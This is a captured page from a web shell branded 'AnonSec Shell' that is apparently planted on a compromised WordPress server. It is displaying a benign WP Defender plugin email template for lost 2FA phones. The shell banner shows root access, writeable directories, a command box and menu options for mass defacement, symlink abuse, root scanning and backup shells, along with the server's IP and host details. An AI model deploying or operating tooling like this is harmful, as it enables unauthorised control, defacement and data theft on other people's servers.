AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.139.233.73   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/defender-security/src/view/email/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/defender-security/src/view/email/2fa-lost-phone.php
<?php
/**
 * This template is used to generate an email for users who have forgotten their
 * 2FA phone number.
 *
 * @package WP_Defender
 */

use WP_Defender\Integrations\Dashboard_Whitelabel;

$dashboard_whitelabel = wd_di()->get( Dashboard_Whitelabel::class );
$can_whitelabel       = $dashboard_whitelabel->can_whitelabel();

$style = 'color: #1A1A1A;
	font-family: Roboto, Arial, sans-serif;
	font-size: 16px;
	font-weight: normal;
	line-height: 24px;
	text-align: left;
	word-wrap: normal;' . (
	! $can_whitelabel || ( $dashboard_whitelabel->is_change_footer() && $dashboard_whitelabel->is_set_footer_text() )
		? 'margin: 0 0 30px;'
		: 'margin: 0px;'
	);

?>

<p style="<?php echo esc_attr( $style ); ?>">
	<?php echo nl2br( esc_html( $body ) ); ?>
</p>

Anon7 - 2022
AnonSec Team